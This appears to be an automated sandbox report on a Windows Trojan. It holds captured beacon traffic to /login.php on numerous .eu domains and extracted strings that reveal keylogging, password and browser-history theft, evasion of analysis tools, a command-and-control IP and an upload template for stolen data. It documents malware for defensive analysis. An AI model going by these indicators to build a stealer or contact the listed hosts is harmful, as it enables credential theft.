User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatun.eu

Content-Length: 9

Pragma: no-cache

Cookie: 22afb07fb7b37e411b809b5a50bb58a4=e3d67bf7a2853f95840a6b5a8f632b61

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx/1.2.4

Date: Mon, 10 Nov 2014 20:01:01 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.3.13

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Status: 404 Article not found

Cache-Control: no-cache

Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xm
lns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
ltr">..<head>...<title>404 - Error: 404</title>..
.<link rel="stylesheet" href="/templates/gatun_jslab/css/style.css"
 type="text/css" />..</head>..<body>..<div class="bo
x404"><img src="/templates/gatun_jslab/images/404.png" alt="" /&
gt;</div>..  <!--...<div class="error">....<div id="
outline">....<div id="errorboxoutline">.....<div id="error
boxheader">404 - Article not found</div>.....<div id="erro
rboxbody">.....<p><strong>You may not be able to visit 
this page because of:</strong></p>......<ol>.......&
lt;li>an <strong>out-of-date bookmark/favourite</strong>
;</li>.......<li>a search engine that has an <strong>
;out-of-date listing for this site</strong></li>.......<
;li>a <strong>mistyped address</strong></li>.....
..<li>you have <strong>no access</strong> to this pa
ge</li>.......<li>The requested resource was not found.<
;/li>.......<li>An error has occurred while processing your r
equest.</li>......</ol>.....<p><strong>Please 
try one of the following pages:</strong></p>......<ul&g
t;.......<li><a href="/index.php" title="Go to the Home P
<<< skipped >>>

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.vocer.org

Pragma: no-cache

HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:01:22 GMT

Server: Apache

X-Powered-By: PHP/5.4.34-nmm1

X-Pingback: hXXp://VVV.vocer.org/xmlrpc.php

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Vary: Accept-Encoding

Connection: close

Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<!--[if lt IE 7 ]><html class="ie ie6" 
lang="de"> <![endif]-->.<!--[if IE 7 ]><html class="
ie ie7" lang="de"> <![endif]-->.<!--[if IE 8 ]><html
 class="ie ie8" lang="de"> <![endif]-->.<!--[if (gte IE 9)
|!(IE)]><!--><html lang="de"> <!--<![endif]-->
..<head>.   <title>.     Seite nicht gefunden | VOCER   &l
t;/title>.   <meta http-equiv="content-type" content="text/html;
 charset=UTF-8" />.   <meta name="viewport" content="width=devic
e-width, initial-scale=1, maximum-scale=1" />.   <meta name="goo
gle-site-verification" content="1dadkxwwudKR5vNoBw-5lL6J0ONWUI09JWut-P
oEGAg" />.   <meta http-equiv="expires" content="0">.      &l
t;link rel="alternate" type="application/rss xml" title="Vocer RSS Fee
d" href="hXXp://VVV.vocer.org/feed/" />.   <meta http-equiv="X-U
A-Compatible" content="IE=edge" />..  .<!-- Favions and Touch ic
ons -->.   <link rel="shortcut icon" href="hXXp://VVV.vocer.org/
wp-content/themes/vocer/images/favicon.ico" />.   <!-- iPad, Ret
ina, iOS ... 7: -->.   <link rel="apple-touch-icon-precomposed" 
sizes="152x152" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/ima
ges/apple-touch-icon-152x152-precomposed.png">.   <!-- iPad, Ret
ina, iOS ... 6: -->.   <link rel="apple-touch-icon-precomposed" 
sizes="144x144" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/ima
ges/apple-touch-icon-144x144-precomposed.png">.   <!-- iPhon
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volez.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache/2.2.16 (Debian)

Vary: Accept-Encoding

Content-Length: 281

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache/2.2.16 (Debian) Server at volez.eu Port 80</address>.
</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lymos.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Content-Length: 1635

Content-Type: text/html

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 10 Nov 2014 20:01:31 GMT

Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.or
g/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The p
age cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" 
Content="text/html; charset=Windows-1252">..<STYLE type="text/cs
s">..  BODY { font: 8pt/12pt verdana }..  H1 { font: 13pt/15pt verd
ana }..  H2 { font: 8pt/12pt verdana }..  A:link { color: red }..  A:v
isited { color: maroon }..</STYLE>..</HEAD><BODY><
;TABLE width=500 border=0 cellspacing=10><TR><TD>..<
h1>The page cannot be found</h1>..The page you are looking fo
r might have been removed, had its name changed, or is temporarily una
vailable...<hr>..<p>Please try the following:</p>..&
lt;ul>..<li>Make sure that the Web site address displayed in 
the address bar of your browser is spelled and formatted correctly.<
;/li>..<li>If you reached this page by clicking a link, conta
ct.. the Web site administrator to alert them that the link is incorre
ctly formatted...</li>..<li>Click the <a href="javascri
pt:history.back(1)">Back</a> button to try another link.</
li>..</ul>..<h2>HTTP Error 404 - File or directory not 
found.<br>Internet Information Services (IIS)</h2>..<hr
>..<p>Technical Information (for support personnel)</p>
..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwli
nk/?linkid=8180">Microsoft Product Support Services</a> a
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganiq.eu

Content-Length: 9

Pragma: no-cache

Cookie: qtrans_cookie_test=qTranslate Cookie Test; PHPSESSID=skch52vu4qkpopsecb93cpfmh2

....~7.~'

HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:00:10 GMT

Server: Apache/2

X-Powered-By: PHP/5.3.23

Set-Cookie: qtrans_cookie_test=qTranslate Cookie Test; path=/; domain=ganiq.eu

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

X-Pingback: hXXp://ganiq.com/xmlrpc.php

X-UA-Compatible: IE=edge,chrome=1

Vary: Accept-Encoding,User-Agent

Connection: close

Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<html lang="nl-NL" prefix="og: hXXp://ogp.me/
ns#" class=" html_stretched responsive av-default-lightbox  html_heade
r_top html_logo_left html_menu_right html_slim html_header_sticky html
_header_shrinking html_mobile_menu_phone html_content_align_center "&g
t;.<head>.<meta charset="UTF-8" />..<!-- page title, di
splayed in your browser bar -->.<title>Page Not Found - ganiQ
</title>..<link rel="icon" href="hXXp://ganiq.com/wp-content/
uploads/2013/04/Favicon_16x16px1.png" type="image/png">..<!-- mo
bile setting -->.<meta name="viewport" content="width=device-wid
th, initial-scale=1, maximum-scale=1">..<!-- Scripts/CSS and wp_
head hook -->..<!-- This site is optimized with the Yoast WordPr
ess SEO plugin v1.6.3 - hXXps://yoast.com/wordpress/plugins/seo/ -->
;.<meta property="og:locale" content="nl_NL" />.<meta propert
y="og:type" content="object" />.<meta property="og:title" conten
t="Page Not Found - ganiQ" />.<meta property="og:site_name" cont
ent="ganiQ" />.<!-- / Yoast WordPress SEO plugin. -->..<li
nk rel="alternate" type="application/rss xml" title="ganiQ » Fee
d" href="hXXp://ganiq.com/feed/" />.<link rel="alternate" type="
application/rss xml" title="ganiQ » reacties feed" href="hXXp://
ganiq.com/comments/feed/" />.<link rel='stylesheet' id='nextgen_
gallery_related_images-css'  href='hXXp://ganiq.com/wp-content/plugins
/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_galle
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyken.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Mon, 10 Nov 2014 20:01:31 GMT

Content-Type: text/html

Connection: close

X-Powered-By: PHP/5.4.30
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">.<html xmlns="hXXp://w
ww.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-
Type" content="text/html; charset=utf-8" />.    <meta name="loop
ia-test" content="XsdXAIxha8q9Xjamck4H" />..<title>Parkerad h
os Loopia</title>.    .    <link rel="apple-touch-icon" media
="screen and (resolution: 163dpi)" href="hXXps://static.loopia.se/resp
onsive/images/iOS-57.png" />.    <link rel="apple-touch-icon" me
dia="screen and (resolution: 132dpi)" href="hXXps://static.loopia.se/r
esponsive/images/iOS-72.png" />.    <link rel="apple-touch-icon"
 media="screen and (resolution: 326dpi)" href="hXXps://static.loopia.s
e/responsive/images/iOS-114.png" />.    <meta name="viewport" co
ntent="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /&g
t;..    <link rel="stylesheet" type="text/css" href="hXXps://static
.loopia.se/responsive/styles/reset.css" />   .    <link rel="sty
lesheet" type="text/css" href="hXXps://static.loopia.se/responsive/sty
les/extra-pages.css" />...<script src="hXXps://static.loopia.se/
responsive/js/respond-js/respond.src.js"></script> <!-- Sc
ript that makes older browsers IE8, FF2 compatible with max- and min-w
idth in MediaQueries -->    .    .</head>.<body>...<
div class="content">...<div class="center"><img src="https
://static.loopia.se/responsive/images/extra_pages/parking-skylt.pn
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadak.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:33 GMT

Server: Apache

Content-Length: 326

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<p>Additionally,
 a 404 Not Found.error was encountered while trying to use an ErrorDoc
ument to handle the request.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: qexer.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:28 GMT

Server: Apache / DataZone

Content-Length: 276

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<hr>.<address
>Apache / DataZone Server at qexer.eu Port 80</address>.</
body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyran.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Server: Apache

Vary: Accept-Encoding

Content-Type: text/html; charset=iso-8859-1

Content-Length: 207

Accept-Ranges: bytes

Date: Mon, 10 Nov 2014 20:01:35 GMT

X-Varnish: 1001493341

Age: 0

Via: 1.1 varnish

Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.</body></html
>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volar.eu

Content-Length: 9

Pragma: no-cache

Cookie: PHPSESSID=f8hggo3ojirvjakuj6m8ijcju4

....~7.~'
HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:02:42 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.4-14 deb7u8

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache
<div id="saleslander">.    <div class="inner clearfix">.. 
                   <span class="icon"></span>.        .   
                 <h1>volar.eu<span> is for sale!</span&
gt;</h1>.            <h3>Buying this domain means full con
trol and ownership.</h3>.                <div class="domain_a
ctions">.            <div class="box_payments">.             
                       <p>Price in Words:<br/><b>nin
e hundred and ninety-nine</b></p>.                        
        <p>Domain Punycode:<br/><b class="punycode">
volar.eu</b></p>.                <p>Payment options:
</p><p class="paymentimg">.                    <img sty
le="border:0;" src="hXXp://volar.eu/images/payment/visa.png" alt="Buy 
and register a domain with VISA" title="Buy and register a domain with
 VISA" />.                    <img style="height:28px;" src="htt
p://volar.eu/images/payment/visa_verified.png" alt="Buy and register a
 domain with VISA" title="Buy and register a domain with VISA" />. 
                   <img style="border:0;" src="hXXp://volar.eu/imag
es/payment/mastercard.png" alt="Buy and register a domain with Masterc
ard" title="Buy and register a domain with Mastercard" />.         
           <img style="height:28px;" src="hXXp://volar.eu/images/pa
yment/mastercard_securecode.png" alt="Buy and register a domain with M
astercard" title="Buy and register a domain with Mastercard" />
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ganiq.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:00:08 GMT

Server: Apache/2

X-Powered-By: PHP/5.3.23

Set-Cookie: qtrans_cookie_test=qTranslate Cookie Test; path=/; domain=ganiq.eu

Set-Cookie: PHPSESSID=skch52vu4qkpopsecb93cpfmh2; path=/

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

X-Pingback: hXXp://ganiq.com/xmlrpc.php

X-UA-Compatible: IE=edge,chrome=1

Vary: Accept-Encoding,User-Agent

Connection: close

Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<html lang="nl-NL" prefix="og: hXXp://ogp.me/
ns#" class=" html_stretched responsive av-default-lightbox  html_heade
r_top html_logo_left html_menu_right html_slim html_header_sticky html
_header_shrinking html_mobile_menu_phone html_content_align_center "&g
t;.<head>.<meta charset="UTF-8" />..<!-- page title, di
splayed in your browser bar -->.<title>Page Not Found - ganiQ
</title>..<link rel="icon" href="hXXp://ganiq.com/wp-content/
uploads/2013/04/Favicon_16x16px1.png" type="image/png">..<!-- mo
bile setting -->.<meta name="viewport" content="width=device-wid
th, initial-scale=1, maximum-scale=1">..<!-- Scripts/CSS and wp_
head hook -->..<!-- This site is optimized with the Yoast WordPr
ess SEO plugin v1.6.3 - hXXps://yoast.com/wordpress/plugins/seo/ -->
;.<meta property="og:locale" content="nl_NL" />.<meta propert
y="og:type" content="object" />.<meta property="og:title" conten
t="Page Not Found - ganiQ" />.<meta property="og:site_name" cont
ent="ganiQ" />.<!-- / Yoast WordPress SEO plugin. -->..<li
nk rel="alternate" type="application/rss xml" title="ganiQ » Fee
d" href="hXXp://ganiq.com/feed/" />.<link rel="alternate" type="
application/rss xml" title="ganiQ » reacties feed" href="hXXp://
ganiq.com/comments/feed/" />.<link rel='stylesheet' id='nextgen_
gallery_related_images-css'  href='hXXp://ganiq.com/wp-content/plugins
/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_galle
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gadoc.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:13 GMT

Server: Apache

Content-Length: 326

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /lo
gin.php was not found on this server.</p>.<p>Additionally,
 a 404 Not Found.error was encountered while trying to use an ErrorDoc
ument to handle the request.</p>.</body></html>...

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.vocer.org

Pragma: no-cache

HTTP/1.0 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache

X-Powered-By: PHP/5.4.34-nmm1

X-Pingback: hXXp://VVV.vocer.org/xmlrpc.php

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Vary: Accept-Encoding

Connection: close

Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>.<!--[if lt IE 7 ]><html class="ie ie6" 
lang="de"> <![endif]-->.<!--[if IE 7 ]><html class="
ie ie7" lang="de"> <![endif]-->.<!--[if IE 8 ]><html
 class="ie ie8" lang="de"> <![endif]-->.<!--[if (gte IE 9)
|!(IE)]><!--><html lang="de"> <!--<![endif]-->
..<head>.   <title>.     Seite nicht gefunden | VOCER   &l
t;/title>.   <meta http-equiv="content-type" content="text/html;
 charset=UTF-8" />.   <meta name="viewport" content="width=devic
e-width, initial-scale=1, maximum-scale=1" />.   <meta name="goo
gle-site-verification" content="1dadkxwwudKR5vNoBw-5lL6J0ONWUI09JWut-P
oEGAg" />.   <meta http-equiv="expires" content="0">.      &l
t;link rel="alternate" type="application/rss xml" title="Vocer RSS Fee
d" href="hXXp://VVV.vocer.org/feed/" />.   <meta http-equiv="X-U
A-Compatible" content="IE=edge" />..  .<!-- Favions and Touch ic
ons -->.   <link rel="shortcut icon" href="hXXp://VVV.vocer.org/
wp-content/themes/vocer/images/favicon.ico" />.   <!-- iPad, Ret
ina, iOS ... 7: -->.   <link rel="apple-touch-icon-precomposed" 
sizes="152x152" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/ima
ges/apple-touch-icon-152x152-precomposed.png">.   <!-- iPad, Ret
ina, iOS ... 6: -->.   <link rel="apple-touch-icon-precomposed" 
sizes="144x144" href="hXXp://VVV.vocer.org/wp-content/themes/vocer/ima
ges/apple-touch-icon-144x144-precomposed.png">.   <!-- iPhon
<<< skipped >>>

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.galin.eu

Pragma: no-cache

HTTP/1.0 200 OK

Date: Mon, 10 Nov 2014 20:01:00 GMT

Server: Apache

X-Powered-By: PHP/5.3.3-7 squeeze19

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Last-Modified: Mon, 10 Nov 2014 20:01:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Cache-Control: post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: tu=9e3d564785c4d8f1cca2f093ea1199ed; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=galin.eu; httponly

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_kRkAETah/3CJMrNekOPpyGIBSDnmjZwDxeFWVrsGiGwR2fRBX LxMZCJQnD3raBdML8RxuFc8Sn58DrcVzg/Yg==

Vary: User-Agent,Accept-Encoding

Content-Type: text/html; charset=UTF-8

X-Cache: MISS from 070837

Connection: close
.<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQ
ADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c o8f
YOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_kRkAETah/3CJMrNekOPpyGIBSDnmjZwDx
eFWVrsGiGwR2fRBX LxMZCJQnD3raBdML8RxuFc8Sn58DrcVzg/Yg=="><head&g
t;<meta charset="utf-8" /><style type="text/css">/*!normal
ize.css v1.1.2 | MIT License | git.io/normalize */ article,aside,detai
ls,figcaption,figure,footer,header,hgroup,main,nav,section,summary{dis
play:block;}audio,canvas,video{display:inline-block;*display:inline;*z
oom:1;}audio:not([controls]){display:none;height:0;}[hidden]{display:n
one;}html{font-size:100%;-ms-text-size-adjust:100%;-webkit-text-size-a
djust:100%;}html,button,input,select,textarea{font-family:sans-serif;}
body{margin:0;}a:focus{outline:thin dotted;}a:active,a:hover{outline:0
;}h1{font-size:2em;margin:0;}h2{font-size:1.33em;margin:0;}h3{font-siz
e:1.1em;margin:0;}h4{font-size:1em;margin:0;}h5{font-size:.83em;margin
:0;}h6{font-size:.67em;margin:0;}abbr[title]{border-bottom:1px dotted;
}b,strong{font-weight:bold;}blockquote{margin:.11em 40px;}dfn{font-sty
le:italic;}hr{-moz-box-sizing:content-box;box-sizing:content-box;heigh
t:0;}mark{background:#ff0;color:#000;}p,pre{margin:.11em 0;}code,kbd,p
re,samp{font-family:monospace,serif;_font-family:'courier new',monospa
ce;font-size:1em;}pre{white-space:pre;white-space:pre-wrap;word-wrap:b
reak-word;}q{quotes:none;}q:before,q:after{content:'';content:none;}sm
all{font-size:80%;}sub,sup{font-size:75%;line-height:0;position:re
<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volym.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 500 Internal Server Error

Server: nginx/1.0.14

Date: Mon, 10 Nov 2014 20:01:13 GMT

Content-Type: text/html; charset=iso-8859-1

Connection: close

Content-Length: 640
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>500 Internal Server Error</title>.</
head><body>.<h1>Internal Server Error</h1>.<p&
gt;The server encountered an internal error or.misconfiguration and wa
s unable to complete.your request.</p>.<p>Please contact t
he server administrator,. [email protected] and inform them of the time 
the error occurred,.and anything you might have done that may have.cau
sed the error.</p>.<p>More information about this error ma
y be available.in the server error log.</p>.<hr>.<addre
ss>Apache/2.2.22 (FreeBSD) PHP/5.3.10 with Suhosin-Patch Server at 
volym.eu Port 80</address>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purol.eu

Content-Length: 9

Pragma: no-cache

....~7.~'
HTTP/1.1 500 Internal Server Error

Date: Mon, 10 Nov 2014 20:01:12 GMT

Server: Apache

Content-Length: 2072

Connection: close

Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..
<html>.<head>..<title>Error 500 - Internal server er
ror</title>.</head>..<body bgcolor="White" text="Black"
>...<table cellspacing="0" cellpadding="0" width="100%" height="
100%" border="0">.<tr>..<td align="center" valign="middle"
>......<table  border="0" cellspacing="0" cellpadding="0">...
<tr>....<td rowspan="5" valign="top"><img src="/spicons
/server.jpg" width=163 height=177 alt="" border="0"></td>....
<td  colspan="4"><img src="/spicons/mrblue.gif" width="500" h
eight=2 alt="" border="0"></td>....<td><img src="/sp
icons/undercover.gif" width=1 height=2 alt="" border="0"></td>
;...</tr><tr>....<td rowspan="4" valign="bottom"><
;img src="/spicons/ecke.gif" width=14 height=43 alt="" border="0">&
lt;/td>......<td valign="middle" align="center"  rowspan="2">
.....<table cellspacing="1" cellpadding="0" width=470 border="0">
;.....<tr>......<td><font face="Verdana, Helvetica, san
s-serif" size="5" color="Red"><b>Error 500 - Internal server 
error</b></font><br><img src="/spicons/undercover
.gif" width=14 height=5 alt="" border="0"><br></td>....
.</tr><tr>......<td><font face="Verdana, Helvetic
a, sans-serif" size="2" color="Black">The server encountered an une
xpected condition which prevented it from fulfilling the request.&
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

.text

`.data

.reloc

`.rdata

@.data

@.reloc

<>http

SSSh  

PASSu:8V

PASSu-8V

PSSSSSSSh

t%F;5

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.5.11

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

